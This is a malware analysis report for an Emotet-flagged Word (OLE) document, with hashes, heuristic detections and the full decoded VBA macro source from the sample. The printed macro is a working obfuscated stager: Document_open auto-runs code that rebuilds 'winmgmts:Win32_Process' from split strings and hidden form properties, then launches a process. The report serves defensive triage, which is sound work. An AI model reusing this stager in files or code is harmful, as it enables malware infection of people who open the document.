Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f43e11eca26da901…

MALICIOUS

Office (OLE)

197.4 KB Created: 2019-12-18 08:26:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 0c9bf188df6018db8daecd7d6f8e73a0 SHA-1: eae18ce7a7eb286e960f4b6fbcd014780cb06c74 SHA-256: f43e11eca26da901a30dda136c7039b3abe7895ad174067ebd0a0639c7c750a5
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464372-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10697 bytes
SHA-256: 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48
Detection
ClamAV: No threats found
Obfuscation or payload: likely
344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Jirqxvrcjakzc
         Case Dhgzjyzqjcpm
   Oyrcksll = Sin(Hhoupuixdsloy)
   Aksioijycvctx = CStr(Kriksbjf)
   Trjzoazlcji = 324
   Knxjmzma = Sin(Yitfnmxre)
   Uqaynuciuivr = CStr(Wuswgnoilkrvu)
   Esdbjqwxkzeks = 567
   Dqehrsfuydflf = Sin(Raqipprqf)
   Whwbdvso = CStr(Rmvgzyfx)
   Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
      While Layyiryhkrag <> Igtjzryblodhb
         Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
      Wend
Next
   Select Case Vehtpovkfitu
         Case Fhtiknlvszx
   Zpuuttwposwh = Sin(Heiqeqrbekhf)
   Zmhwjsvvlo = CStr(Fzrowakt)
   Jjtpdxkjmntm = 324
   Kaygxmsu = Sin(Ksjqnhuf)
   Dydtpykbb = CStr(Tjqdwcdvs)
   Sqelntwftnh = 567
   Lxerzbqsfvrit = Sin(Frjmingmoek)
   Wstmbsszx = CStr(Rjxnunduheabd)
   Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
      While Ztlsomxbjavmn <> Hczfgoapsase
         Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
      Wend
Next
   Select Case Xutfhjzrc
         Case Fxvmwkubs
   Hmzcyhinjzpn = Sin(Jdcqrdzqn)
   Kpwnatild = CStr(Fekrioviq)
   Engrlasuqye = 324
   Rmzifgbducx = Sin(Zukvffxvl)
   Jiitixhbj = CStr(Wondjilj)
   Sfaxkutyxt = 567
   Tywyivwv = Sin(Kzywicwojby)
   Chvycocmcts = CStr(Gkzqmpmevbz)
   Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
      While Snsurtqpvkvnk <> Ejuypptbnk
         Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
      Wend
Next
Xgmmntpfabj
End Sub

Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
   Select Case Pudafirtriera
         Case Ethbtoflgkn
   Rcdncrfu = Sin(Uvfwlerxpk)
   Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
   Hpnywjyobxnh = 324
   Ptdupuwzah = Sin(Vzepkbsqagcsf)
   Adubcsjd = CStr(Myxwipfsan)
   Lmloelirkp = 567
   Vvfgddlvogy = Sin(Tsrxaeseqrhq)
   Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
   Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
      While Njvaczjkrgiu <> Wksontwww
         Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
      Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
   Select Case Ywnwqvijnirak
         Case Ixsdlntodw
   Gvwqliwgnveis = Sin(Xamjybve)
   Svleikaex = CStr(Qsfsokxnsjl)
   Voqmnvkqqk = 324
   Kbfkeeuzmh = Sin(Rjryrnvhl)
   Ttnqbrxahm = CStr(Jscofrka)
   Judemzcpl = 567
   Smrqnshoga = Sin(Fifozppbyu)
   Snxfyysbes = CStr(Lysydmhfo)
   Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
      While Asdbvzxvb <> Ghccecbmr
         Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
      Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
   Select Case Rcmsldowoup
         Case Fqejjmrliy
   Doirgesgqe = Sin(Lbolnkoemqmf)
   Apybidcjhpff = CStr(Xauaxmyixgy)
   Fwmbdkkech = 324
   Qqctzgibyglwm = Sin(Xrssdkswmuoc)
   Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
   Lendnlsqhbzac = 567
   Oogxbeygfkxk = Sin(Sibgqnvbsyns)
   Uqmlqvxxs = CStr(Umxitpanxos)
   Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
      While Cpfzswyvebxk <> Nkkkufrmg
         Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
      Wend
Next
Ybazpsmlhhhz = Twyotyzlmuu + Nvexppvwbclb.Kxwxljzwwv + Nvexppvwbclb.Jjxokufcbwu.Factoid
   Select Case Cdvzgcgdbcvr
         Case Xyhuuhukhb
   Mzlaphwlln = Sin(Tsqekxotqanh)
   Sfasvthyqg = CStr(Moulxjop)
   Qqzknzsl = 324
   Feorltsql = Sin(Jmjlzyfd)
   Fkrojslfifeu = CStr(Iadzeryefzgdq)
   Anihlztxcba = 567
   Dqypzncyuf = Sin(Ubfshfbnqhs)
   Bvpdaydkmbo = CStr(Edvpghjurynf)
   Ztuwxccyrnvug = 5645
End Select
For Haqrqbxr = Knsjxbyf To Rsfqypfm
      While Mbnsjywneubc <> Npjotmwoerkp
         Sbvligojzzaye = Icpzkdjf * Atn(Vyxwvhudwudy) * (Mgepjovhlnwo + Kwjvesmirme)
      Wend
Next
Wyjpoleontqe = Pwygysmwjcru + Ybazpsmlhhhz + Pwygysmwjcru
   Select Case Lcwitdhj
         Case Nlgyrrzxn
   Sqgvgxjelxtsa = Sin(Ihvliyfbv)
   Yxzvqreeslp = CStr(Fyexittfhlj)
   Bbynpkdr = 324
   Fpgbowytsv = Sin(Jthscyirl)
   Pqdgewfi = CStr(Nzhbrfjjs)
   Svrefwifihzom = 567
   Kptxnmmzwu = Sin(Kszitzgwulb)
   Xdnznkujgutpu = CStr(Gvvkffymiz)
   Gvqznuyqjzz = 5645
End Select
For Fheygszwvq = Rttzreahvno To Fvwnbgvmbzyt
      While Hgslfrjw <> Rrvzbortp
         Wdjtjdeq = Fcbsaccixmiv * Atn(Jlvkmieelckdj) * (Oeggjlotgalol + Rblmkxhtdlq)
      Wend
Next
End Function
Function Xgmmntpfabj()
   Select Case Zcvyzfxy
         Case Lgootoeshbduc
   Nsfrcnunt = Sin(Tzysthmqjxvg)
   Pzmnyfzsqlmsh = CStr(Qtuobvetoi)
   Mtkrmdrno = 324
   Uusajmgaatese = Sin(Aelfxfdxmzft)
   Pfyitaujuug = CStr(Upiagqucn)
   Kuqxfbdtg = 567
   Ngjkaxqkqy = Sin(Iheyzdfmcdpxz)
   Etrnbxkccqvpw = CStr(Lkuwipac)
   Axhjqmkramr = 5645
End Select
For Oayfchdnia = Fcdbgdqmyazd To Elyvzlmzgv
      While Yubcrwhrlj <> Tjammnbvmqd
         Mbofgwirwfw = Icvbaveicpkzm * Atn(Pxhrjmevslem) * (Xeebqeyzlqhnh + Dfteocyxeb)
      Wend
Next
MNDUE = "32ksad_weddv"
Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
   Select Case Dudqtilj
         Case Mzvpijcqtv
   Pwwovkwiib = Sin(Dekxkkgn)
   Vnncqdpyr = CStr(Tfhtenanpakf)
   Dzfgjouyib = 324
   Susskkdk = Sin(Cdgwfawgkhvpn)
   Rhbyvwgkdu = CStr(Xqachcewcamj)
   Bqbfdhoj = 567
   Blocwtcb = Sin(Zpkfnmiih)
   Sdtupjyrzfoy = CStr(Vobzixlk)
   Mgvrqyfb = 5645
End Select
For Iiuhgkekz = Rneryhiztj To Rijngbbamxp
      While Tttytakoqut <> Rqxchyasczwwx
         Zyuynefnpaajy = Oqxhjkdk * Atn(Rvquwbvrlor) * (Dvlchbhpbrbk + Qzowofhvjpttz)
      Wend
Next
Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
   Select Case Yhdhwylebxxim
         Case Ufaiuzqc
   Ewxcbkbfj = Sin(Hsezvbfg)
   Jlcbtpgvxhe = CStr(Rcoczmvd)
   Cmnwjzxkw = 324
   Ulvahvujmow = Sin(Mxgzftjmgfa)
   Sxwzwidlx = CStr(Bsrbuqrgfwjl)
   Fcocnfumccwmm = 567
   Dfpgnynbisp = Sin(Jijmebrfpijl)
   Ppehdasbquf = CStr(Sbfkxradtskil)
   Oxfupjxme = 5645
End Select
For Mbhspgzbye = Mtylwwtzsajmt To Pqvobzlfyv
      While Eikbefzt <> Xaqkltlsvya
         Kdqhyaozqv = Qhzfhtvkytu * Atn(Ortgaccjyay) * (Bslrgexuummmn + Klqisqjiv)
      Wend
Next
Fhpzuxlwmaukx = Yidwojlxvu + Nvexppvwbclb.Ygxcnftfdrk.ControlTipText + Nvexppvwbclb.Gyykdkjt.ControlTipText
   Select Case Kumigxelb
         Case Xmpmgyjz
   Mkdugown = Sin(Savlzvwq)
   Rykgmjohasp = CStr(Iyjiozjiybdjx)
   Nlbtkiina = 324
   Xapmhovam = Sin(Miqfitxhxos)
   Pqwmrzljlfci = CStr(Tonxeswztc)
   Opsateqv = 567
   Rjjnahacowp = Sin(Tjqnqxpw)
   Qlvqlmxsx = CStr(Xeorrpyr)
   Kgmzrcqzxh = 5645
End Select
For Csbfqpqqeruav = Wzhrffxf To Rujgszgizb
      While Myjbxftmldm <> Apqosfmxwyvg
         Rnswcghnii = Rmsxohimr * Atn(Thwjspanuot) * (Thktmnghlknae + Oxwthxyofx)
      Wend
Next
Zcamqyegpjckz = Fhpzuxlwmaukx + Cfifdbzh.Txqcvasu
   Select Case Nebhhwjgrpo
         Case Tlnyovaatjkdu
   Dmxhndeenl = Sin(Fxdrrcxik)
   Zzkouvqdnx = CStr(Frhdtoha)
   Pvcprtbx = 324
   Ccxicokiwhyie = Sin(Zkydtcawxjple)
   Cqgaactyafezd = CStr(Hqhrsict)
   Bgazndfeyfibd = 567
   Gmxypdxrubzdn = Sin(Zwjezwtyncy)
   Zugmovlwe = CStr(Sepfyozst)
   Mrzuznnkw = 5645
End Select
For Srzumpsasu = Lugnaycg To Tiomtvyitzrj
      While Gdbjztrllpozs <> Ltjixxrgzwx
         Aakbiihwxt = Diwyytcyv * Atn(Iboaoxbnc) * (Lkfmrktqo + Atpuhacv)
      Wend
Next
Set Xgmmntpfabj = CreateObject(Zcamqyegpjckz)
   Select Case Mkeoisdh
         Case Ebiywags
   Yovmuwzznhy = Sin(Hiltnvlsime)
   Earikgew = CStr(Osumtdtgbzmbq)
   Txcvpbrzq = 324
   Hfwsasdkxbtjs = Sin(Fcnqckgbrjc)
   Vwsdtuvojjz = CStr(Gnfaojhawomaq)
   Dfixrpob = 567
   Pysbvtoveet = Sin(Ustnzhfccfuk)
   Bdirlxky = CStr(Zavyfmkhino)
   Cotcmnsxrrtmr = 5645
End Select
For Hygvheozmh = Vmcqmwfgdsu To Trijclnrxa
      While Swtophuow <> Oahpmojpeh
         Nfqkwjzymsj = Lsnlzjowftjvv * Atn(Okezhigi) * (Yfxyzvqnpbwve + Vrhmhpbhxkboj)
      Wend
Next
Xgmmntpfabj.XSize = False
   Select Case Dzaqiwcty
         Case Rxjjznnirydbp
   Feszrdghtgdqh = Sin(Wmejmvcgw)
   Ohizylmkrxaz = CStr(Kqqcvwfukbqw)
   Dcyvexpyztis = 324
   Wjwnvqbfmebyo = Sin(Gjcfugozeuldm)
   Ucsiyafdapqyq = CStr(Gjvatkfmjqhk)
   Jmoopjyfgvwa = 567
   Qeiyfkoc = Sin(Wmppjrqqnl)
   Bjakvadz = CStr(Edwfijehdhdc)
   Ujwofgmu = 5645
End Select
For Dyyvooyjidh = Dihmghjyyrwp To Ouxgjsic
      While Jtoiuunwip <> Xtgmbpegb
         Kkpkxxtk = Wcmsbddeahwli * Atn(Zwrtxcje) * (Yfkqyoerg + Tuzlbcayeyb)
      Wend
Next
Xgmmntpfabj.YSize = False
   Select Case Okkazawojaab
         Case Mkapxqbst
   Iyhrakbqntmtr = Sin(Jwfvdezag)
   Rzduwrpbrcpw = CStr(Zlqmzrihqhe)
   Quixbwgsbmtxv = 324
   Retzvfetiog = Sin(Kjwpjtygif)
   Dxxyxpen = CStr(Lnersmbaius)
   Spdncfkiy = 567
   Shhulycqsuxik = Sin(Meiwthhq)
   Tbbiihmify = CStr(Hokscdnvh)
   Ctfablrlrclrw = 5645
End Select
For Kmkzftohw = Bedcjbafzo To Lxnmubwxn
      While Takhncnljgpk <> Otjqqathf
         Sgtfavyi = Cyundlctav * Atn(Eghnhxrb) * (Lfvvugilqbdy + Odmoqofdorbn)
      Wend
Next
Do While Hfiglzcehibq.Create(UJNDB & Wyjpoleontqe, Hsqlwgckyi, Xgmmntpfabj, Dbsewlml)
Loop
   Select Case Frszjoiyo
         Case Lxxxyncay
   Eqxhbtpdgo = Sin(Ifjswjfqwr)
   Tddhcbzto = CStr(Cbbnojlqtr)
   Spvgqsaqnjq = 324
   Qhafoaxpsgquw = Sin(Lbmpholrg)
   Aobzskmqxb = CStr(Frnzziemub)
   Lxbhifquj = 567
   Jnsoghftfaqgx = Sin(Liciozuwoui)
   Slqbzrelh = CStr(Eoioevqdmsuhr)
   Apreuxbxatko = 5645
End Select
For Pddoeezrf = Dfspydyairpu To Acrhuugjxxpqt
      While Rjjzlrsjhcqlo <> Aibpebijlxm
         Vahkmdqif = Ihtjeeirkjw * Atn(Diujzyczwln) * (Fzkiguokgwiy + Oujyztsgd)
      Wend
Next
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.